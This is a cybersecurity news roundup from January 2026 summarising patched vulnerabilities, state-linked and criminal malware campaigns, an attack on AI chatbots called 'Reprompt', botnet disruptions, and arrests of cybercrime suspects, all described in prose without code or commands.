Microsoft has released its January 2026 Patch Tuesday updates, addressing more than 100 security vulnerabilities across a wide range of its software products, including one actively exploited zero-day and two other vulnerabilities that were previously publicly disclosed. The actively exploited vulnerability, tracked as CVE-2026-20805, affects the Windows Desktop Window Manager and can lead to information disclosure. According to Microsoft, a successful exploit allows an attacker to read memory addresses associated with a remote Advanced Local Procedure Call (ALPC) port.
CISA has warned that a high-severity security flaw in the self-hosted Git service Gogs is being actively exploited in the wild. The flaw, tracked as CVE-2025-8110, is a path traversal issue that can allow attackers to execute code. It exists due to improper symbolic link handling in the PutContents API caused by insufficient patch for CVE-2024-55947. A remote user can write file to arbitrary location on the system and execute arbitrary code.
Palo Alto Networks has released security updates to fix a high-severity vulnerability affecting GlobalProtect Gateway and Portal. The flaw, tracked as CVE-2026-0227, can cause a denial-of-service (DoS) condition due to improper handling of exceptional conditions in PAN-OS software. A proof-of-concept exploit is available. Palo Alto Networks said that the vulnerability affects only to PAN-OS NGFW or Prisma Access configurations with an enabled GlobalProtect gateway or portal. PAN Cloud Next-Generation Firewall (NGFW) is not impacted. There are no workarounds to mitigate the flaw. The company said it is not aware of malicious exploitation of the vulnerability.
SmarterTools has fixed a high-risk vulnerability (CVE-2025-52691) affecting its SmarterMail software. The flaw allows an unauthenticated attacker to upload arbitrary files to arbitrary locations on the mail server, potentially enabling remote code execution. SmarterMail builds 9406 and earlier are affected, and SmarterTools released a fix in Build 9413. While there’s no indication that the issue is being exploited in the wild, a PoC code for the flaw is available, so all affected users are strongly recommended to apply updates as soon as possible.
Russia-linked hackers have launched a cyber-espionage campaign targeting Ukraine’s military personnel by posing as charitable organizations. According to CERT-UA, the attacks took place between October and December 2025 and targeted members of Ukraine’s Defense Forces. The campaign leveraged a previously undocumented strain of malware dubbed ‘PluggyApe.’ CERT-UA attributed the activity to a state-backed group known as Void Blizzard, also tracked as Laundry Bear and designated by Ukrainian authorities as UAC-0190.
Chinese government-backed hackers breached multiple critical infrastructure organizations in North America over the past year, according to Cisco Talos. The group, tracked as UAT-8837, gained access using stolen credentials and exploited servers, including a Sitecore zero-day vulnerability (CVE-2025-53690). The threat actor uses a combination of tools in post-compromise hands-on-keyboard operations, including Earthworm, Sharphound, DWAgent, and Certipy.
The DomainTools security team released an analysis of data leaked from Chinese security firm and government cyber contractor Knownsec. The leak shows that Knownsec is closely linked to China’s security and intelligence agencies. Its systems collect and organize large amounts of global internet data and personal information, making it easier to identify, track, and target people and organizations overseas. The vendor’s tools support hacking, surveillance, and long-term access to foreign networks and email accounts. Internal documents indicate that Knownsec mainly serves police, military, and intelligence clients.
Cybersecurity researchers have discovered a previously undocumented malware framework targeting Linux systems, dubbed ‘VoidLink.’ The platform is designed to operate in cloud and container environments. According to analysis by Check Point Research, VoidLink is a cloud-focused implant written primarily in Zig with a flexible modular architecture. It’s based on a custom Plugin API inspired by Cobalt Strike’s Beacon Object Files, supporting more than 30 plug-in modules by default. The modules enable a wide range of capabilities, from credential harvesting and lateral movement to persistence and defense evasion.
An Iranian threat actor known as ‘MuddyWater’ has launched a new spear-phishing campaign targeting diplomatic, maritime, financial, and telecommunications organizations across the Middle East. The attack delivered a Rust-based remote access implant dubbed ‘RustyWater.’
The Trellix Advanced Research Center has spotted an active malware campaign that exploits a DLL sideloading issue in a legitimate Windows utility called ‘ahost.exe,’ which is a component of the open-source c-ares library used for asynchronous DNS lookups. The campaign mainly delivers commodity malware, including info-stealers such as AgentTesla, FormBook, Lumma Stealer, Vidar, and CryptBot, as well as remote access trojans (RATs) like Remcos, QuasarRAT, DCRat, and XWorm.
A separate Trellix report details a new malicious campaign, in which threat actors are leveraging the browser-in-the-browser (BitB) phishing technique to steal Facebook login credentials.
A new malware campaign, dubbed ‘SHADOW#REACTOR,’ uses a multi-stage infection chain to deploy the commercially available Remcos RAT and establish persistent access to compromised systems. According to researchers at Securonix, the attack begins with an obfuscated Visual Basic Script (VBS) launcher executed via wscript.exe. The script triggers a Base64-encoded PowerShell downloader, which retrieves fragmented, text-based payloads from a remote server.
Socket’s Threat Research Team has discovered five malicious Chrome extensions targeting enterprise platforms like Workday, NetSuite, and SuccessFactors. The extensions steal authentication data, block security controls, and allow full account takeover via session hijacking. The campaign involves three attack types: cookie exfiltration to remote servers, DOM manipulation to block security administration pages, and bidirectional cookie injection for direct session hijacking. Socket says that all five extensions remain under investigation, and that Google's Chrome Web Store security team was informed of the issue.
Security researchers at Varonis have shared details of a new attack called ‘Reprompt’ that could let attackers steal sensitive data from AI chatbots like Microsoft Copilot with just one click on a legitimate link. The attack requires no plugins or further user interaction and can continue even after the chat is closed. Microsoft fixed the issue after it was reported, enterprise users of Microsoft 365 Copilot were not affected.
A security weakness in AWS CodeBuild, dubbed ‘CodeBreach,’ could have allowed attackers to take over AWS’s own GitHub repositories, including the AWS JavaScript SDK. By exploiting a weakness in CI pipelines, attackers might have stolen admin credentials and injected malicious code, potentially impacting all AWS accounts. AWS fixed the issue in September 2025 after cybersecurity firm Wiz alerted the company to the issue.
Sansec discovered an active keylogger on the employee merchandise store of a major US bank. The malware harvests all form data (including passwords and personal information) from over 200,000 potential victims.
Internet infrastructure company Lumen disrupted the Kimwolf DDoS botnet by sinkholing more than 550 command-and-control (C&C) servers. The action cut off malware on nearly 250,000 infected devices from their operators. Although Kimwolf partially recovered within a day, it returned at only a small fraction of its original size. The botnet is known for launching massive DDoS attacks and using residential devices to hide malicious scanning and exploitation activity.
CyberArk has published threat research on the StealC infostealer malware and identified the operator of the service, referred to as YouTubeTA, as a Russian speaking individual.
Infoblox researchers published a detailed report on a growing ecosystem of service providers that equip criminal networks with the tools, infrastructure, and expertise needed to operate large-scale pig butchering or ‘sha zhu pan’ scams. According to the research, the providers have built a “pig butchering-as-a-service” (PBaaS) economy, similar to malware- and phishing-as-a-service models. Rather than operating alone, scammers can now buy solutions that allow them to run sophisticated fraud campaigns without advanced technical skills.
The latest incarnation of the notorious BreachForums hacking forum had its MyBB user database table leaked online, with over 320 000 accounts exposed. The leak came to light after a website named after the ShinyHunters extortion gang published a 7Zip archive containing three files, including a MyBB users table and BreachForums’ private PGP key used to sign administrator messages.
Microsoft has disrupted RedVDS, a large cybercrime-as-a-service platform linked to at least $40 million in reported losses in the United States since March 2025. The company filed civil lawsuits in the US and the UK, seizing key infrastructure and taking RedVDS’s marketplace and customer portal offline. The action was part of a coordinated international effort involving Europol and German authorities.
Dutch authorities have arrested the alleged administrator of AVCheck, a cybercrime service used by malware developers to test their malicious software against antivirus detection. The platform enabled criminals to improve malware, helping it evade security defenses before being deployed in real-world attacks.
A Russian national, Oleg Nefedov, has been officially identified as the leader of the BlackBasta ransomware group. German authorities issued a wanted notice for him last week. Nefedov was arrested in Armenia in June 2024 but was released three days later after a judge declined to extend his detention. He subsequently fled to Russia. According to internal BlackBasta chat logs, Nefedov boasted that he contacted Russian officials and secured a “green corridor” to return home safely.
Ukrainian and German law enforcement, with support from Europol, uncovered members of a Russia-linked ransomware hacking group responsible for cyberattacks causing hundreds of millions of euros in damage worldwide. Two suspects were identified in Ukraine, while the alleged Russian organizer possibly linked to the Conti ransomware group has been placed on Interpol’s international wanted list.
Swedish authorities have detained a 33-year-old former IT consultant to the Armed Forces on suspicion of espionage on behalf of Russian intelligence. According to the prosecution, the suspected criminal activity occurred throughout 2025 and into 2026, although investigators believe the alleged spying may have begun as early as 2022, the year Russia launched its full-scale invasion of Ukraine.
An American man is set to plead guilty to a misdemeanor charge for hacking the US Supreme Court’s electronic case filing system. Court documents say 24-year-old Nicholas Moore accessed the system without authorization on 25 days between August and October 2023. Authorities have not disclosed what information was accessed.